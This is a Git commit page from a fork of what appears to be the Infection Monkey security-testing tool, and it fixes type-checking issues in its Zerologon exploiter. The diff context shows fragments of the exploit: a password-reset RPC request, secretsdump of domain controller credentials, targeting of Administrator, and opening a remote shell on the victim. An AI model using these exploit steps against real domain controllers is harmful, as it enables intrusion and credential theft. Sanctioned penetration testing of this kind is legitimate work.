forked from p15670423/monkey
Agent: Fix some mypy issues in zerologon.py
This commit is contained in:
Shreya Malviya
parent
97dcbe6168
commit
0a73ca717c
|
|
@ -132,6 +132,8 @@ class ZerologonExploiter(HostExploiter):
|
||||||
except BaseException as e:
|
except BaseException as e:
|
||||||
logger.info(f"Unexpected error: {e}")
|
logger.info(f"Unexpected error: {e}")
|
||||||
|
|
||||||
|
return None
|
||||||
|
|
||||||
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
|
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
|
||||||
request = nrpc.NetrServerPasswordSet2()
|
request = nrpc.NetrServerPasswordSet2()
|
||||||
ZerologonExploiter._set_up_request(request, self.dc_name)
|
ZerologonExploiter._set_up_request(request, self.dc_name)
|
||||||
|
|
@ -220,9 +222,9 @@ class ZerologonExploiter(HostExploiter):
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
if rpc_con:
|
if rpc_con:
|
||||||
rpc_con.disconnect()
|
rpc_con.disconnect() # type: ignore[attr-defined]
|
||||||
|
|
||||||
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
|
def get_all_user_creds(self) -> Optional[List[Tuple[str, Dict]]]:
|
||||||
try:
|
try:
|
||||||
options = OptionsForSecretsdump(
|
options = OptionsForSecretsdump(
|
||||||
# format for DC account - "NetBIOSName$@0.0.0.0"
|
# format for DC account - "NetBIOSName$@0.0.0.0"
|
||||||
|
|
@ -237,7 +239,7 @@ class ZerologonExploiter(HostExploiter):
|
||||||
|
|
||||||
self._extract_user_creds_from_secrets(dumped_secrets=dumped_secrets)
|
self._extract_user_creds_from_secrets(dumped_secrets=dumped_secrets)
|
||||||
|
|
||||||
creds_to_use_for_getting_original_pwd_hashes = []
|
creds_to_use_for_getting_original_pwd_hashes: List[Tuple[str, Dict]] = []
|
||||||
admin = "Administrator"
|
admin = "Administrator"
|
||||||
for user in self._extracted_creds.keys():
|
for user in self._extracted_creds.keys():
|
||||||
if user == admin: # most likely to work so try this first
|
if user == admin: # most likely to work so try this first
|
||||||
|
|
@ -304,16 +306,18 @@ class ZerologonExploiter(HostExploiter):
|
||||||
|
|
||||||
self._publish_credentials_stolen_event(extracted_credentials)
|
self._publish_credentials_stolen_event(extracted_credentials)
|
||||||
|
|
||||||
def _publish_credentials_stolen_event(self, extracted_credentials: Sequence[Credentials]):
|
def _publish_credentials_stolen_event(
|
||||||
|
self, extracted_credentials: Sequence[Credentials]
|
||||||
|
) -> None:
|
||||||
credentials_stolen_event = CredentialsStolenEvent(
|
credentials_stolen_event = CredentialsStolenEvent(
|
||||||
tags=ZEROLOGON_EVENT_TAGS,
|
tags=ZEROLOGON_EVENT_TAGS,
|
||||||
stolen_credentials=extracted_credentials,
|
stolen_credentials=extracted_credentials,
|
||||||
)
|
)
|
||||||
self.event_queue.publish(credentials_stolen_event)
|
self.event_queue.publish(credentials_stolen_event)
|
||||||
|
|
||||||
def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str:
|
def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> Optional[str]:
|
||||||
if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
|
if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
|
||||||
return
|
return None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
options = OptionsForSecretsdump(
|
options = OptionsForSecretsdump(
|
||||||
|
|
@ -339,6 +343,8 @@ class ZerologonExploiter(HostExploiter):
|
||||||
finally:
|
finally:
|
||||||
self.remove_locally_saved_HKLM_keys()
|
self.remove_locally_saved_HKLM_keys()
|
||||||
|
|
||||||
|
return None
|
||||||
|
|
||||||
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
|
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
|
||||||
logger.info(f"Starting remote shell on victim with user: {username}")
|
logger.info(f"Starting remote shell on victim with user: {username}")
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue